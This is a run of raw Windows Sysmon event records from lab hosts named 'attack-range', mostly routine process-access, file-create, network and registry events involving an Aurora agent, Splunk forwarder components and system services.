12:18:54.702{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.700{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.698{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000040835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.275{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=C4ED7FB46355B3445BC1F0F1BBA1FD85,SHA256=D710D66A913B12871CE037FDCF498445DAE5ED6A0CB48787CB88669BADAB0110,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.193{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.192{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.187{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.187{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.187{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.175{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000015642Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:55.855{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFD9D53659A2174E86591F7E5B984039,SHA256=0C89927E51E007B62616739018D391901E6B5B317A420AFF3F1C6B7A342A72AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:55.880{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CB2A7B567FDA4D7F5836E867059AFDC,SHA256=F3CE98CE286B8C920211A7FA74F0780DD3B926B560C4B5CC0E6E2EB3C750D48A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:55.794{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B247F864DEA188CB259D3A350DD92EB,SHA256=B3B719D87B3783D562AE1C9DDA764F21BC3DB39CAEC3B2940BD7D835E329ECFC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015645Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:56.943{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80CD90D792F8FDE81CA5D9DE3395E981,SHA256=E5CB4A906F33089D413526F11153F935078B646882B8C34FA52A668111727D86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:56.889{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8428DFF9E24517F6FE15362C04D8F30F,SHA256=93E2A91E1D3D2C7A0D0DC86114215B2EB6A6AE19C4DC65345BAE04B32D0EB30A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015644Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:55.066{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50059-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 13241300x800000000000000015643Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:18:56.152{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d92b37-0x0930af45) 354300x800000000000000040861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.304{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56255-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000040860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:54.304{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56255-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000040863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:57.984{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B5896886551AE4B808D737F5E8194D6,SHA256=DA9819C80F36C5AA28F542D92898F6E312BF1D801EEAB14EB66595573BC11C4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015646Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:58.052{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D576E55762B6710F955FB38E6BDF74D2,SHA256=8C4322A6964C99BDA3B5240693A51202C25E10E1BEB456DBA1F83CFBD76B2085,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:55.656{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56256-false10.0.1.12-8000- 23542300x800000000000000015647Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:59.147{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0FB3F1249B86944CCC5FF10722B0A5C,SHA256=1198CFDC905C779791626080E53268AB3AA599D6F1AC26C7BE4E3D954DFF8FDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:59.064{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CBC69A80A932BE6F2F7B13464911F9A,SHA256=11A57777946B057CA3183FADAD1FD7BE13A5FBE1CFE5E5B6B002B0BEF6A79205,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015649Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:00.980{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=8B1959BF99833F16F711E91999518B94,SHA256=60FEB39E6E66E071ACE13438A2B2DB95FFEA6866C603C2D956CF826630101730,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015648Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:00.234{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=642D5CE847A0D05EA2ACFB29DEF675EE,SHA256=8AA6BAF60130BEABFC1EF11249064C723929075541B2A546FB19D5283137343F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:00.216{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=A1D631F0E099D79FF0E3D4659B631EC7,SHA256=456C35DEDF8808407EAF16695871B6D102A3A5272CE1DDB0886FB2BD02ED3FC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:00.138{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DDEA7FFE55285A681FEB95F33E4CCD4,SHA256=3CA8743CA4FFB8F4778711096D41F0B30AE527ECC4B76E26FFE98B64BD5B6E3B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015650Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:01.322{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4219CA102CBD12C8D29D54B324394CF7,SHA256=593B19EF47527418F0FC66D9C0A1E006AE9222EEBE867C76ADFEFB381217C0F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:01.218{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=801369A69B9C36EF6DF87A842C971635,SHA256=3CCCF31AC5465D4A9C4C1BB02D9824B54381363E2BBCA27179D44461D7D68F67,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:02.285{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DA9116B64715DE70B2B83F2837555E8,SHA256=B7AB05CCBBE2128C9159A497884340D313D9CAFAABFB40779680441D14AA6A02,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015683Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.736{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015682Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.734{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015681Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.733{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015680Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.729{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015679Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.727{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015678Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.726{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015677Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.725{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 